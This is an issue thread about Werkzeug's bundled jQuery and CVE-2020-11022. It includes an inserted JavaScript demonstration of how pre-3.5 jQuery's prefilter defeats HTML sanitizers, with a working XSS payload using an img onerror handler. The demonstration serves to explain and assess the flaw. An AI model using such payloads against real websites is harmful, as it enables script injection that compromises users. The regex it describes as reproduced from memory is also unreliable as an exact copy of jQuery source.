According to our security scanning tool, the packaged version of jquery inside Werkzeug has a security exposure

When I run a security exposure scan on the werkzeug library I get this jquery issue:

https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-11022

s/werkzeug/debug/shared/jquery.js

In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

Environment:

Python version: 3.7
Werkzeug version: 1.0.1
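The CVE text above says sanitized HTML can still execute, which is surprising until you see what jQuery did to markup before handing it to the browser. The following is an added example, not code from the Werkzeug or jQuery projects: it reproduces the `htmlPrefilter` step that jQuery < 3.5.0 applied to every string passed to `.html()`/`.append()`, and the identity behaviour that 3.5.0 switched to. The self-closing-tag regex is reproduced from memory of the jQuery 3.4.x source and should be treated as an assumption; the `<style>` parsing model and the payload string are constructed for this demonstration. It runs in plain Node with no DOM.

```javascript
// Added example (not from Werkzeug or jQuery): why CVE-2020-11022 bypasses a
// sanitizer. The sanitizer sees an <img> that sits as inert text inside a
// <style> block; jQuery's pre-3.5 prefilter rewrites "<style />" into
// "<style ></style>", which closes the outer <style> early and turns the <img>
// into a real element whose onerror handler fires.

// Self-closing expansion used by jQuery < 3.5.0 (reproduced from memory of the
// 3.4.x source; the exact pattern is an assumption).
const rxhtmlTag =
  /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi;

// jQuery < 3.5.0: expand "<tag ... />" into "<tag ...></tag>".
function legacyHtmlPrefilter(html) {
  return html.replace(rxhtmlTag, "<$1></$2>");
}

// jQuery >= 3.5.0: markup is passed through untouched.
function fixedHtmlPrefilter(html) {
  return html;
}

// Minimal model of how the HTML parser treats <style>: everything up to the
// first </style> is raw text, so tags inside it never become elements.
// Returns true when an <img ...> tag ends up outside any <style> and would
// therefore be parsed as a live element.
function imgBecomesLiveElement(html) {
  const tag = /<\/?[a-z][^>]*>/gi;
  let inStyle = false;
  let m;
  while ((m = tag.exec(html)) !== null) {
    const t = m[0].toLowerCase();
    if (inStyle) {
      if (t.startsWith("</style")) inStyle = false; // first </style> ends raw text
      continue;
    }
    if (t.startsWith("<style")) {
      inStyle = true;
      continue;
    }
    if (t.startsWith("<img")) return true;
  }
  return false;
}

// Constructed payload: a sanitizer that allows <style> sees only text inside it.
const payload = '<style><style /><img src=x onerror=alert(1)></style>';

// Compare what the two jQuery versions would hand to the browser.
function compare(html) {
  const legacy = legacyHtmlPrefilter(html);
  const fixed = fixedHtmlPrefilter(html);
  return {
    legacy,
    legacyExecutes: imgBecomesLiveElement(legacy),
    fixedExecutes: imgBecomesLiveElement(fixed),
  };
}

console.log(compare(payload));
```

Running it prints the rewritten string (`<style><style ></style><img ...></style>`) with `legacyExecutes: true` and `fixedExecutes: false`. The practical check for a Werkzeug deployment is therefore which `htmlPrefilter` the bundled `jquery.js` carries, and, as the reply below notes, whether the debugger page that loads it is reachable at all.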
Please see previous discussions about jQuery before reporting new issues. jQuery is only used by the debugger in the development server, which is already a huge hole if you're running it anywhere where the ability to craft an XSS for it would matter. These CVEs are not relevant for the way jQuery is used by Werkzeug. Your security tools should be able to account for that so that you can ignore irrelevant results.
That said, we have already removed jQuery completely for 2.0: #1807. And before we did that, we had already upgraded it to 3.5.1: #1806.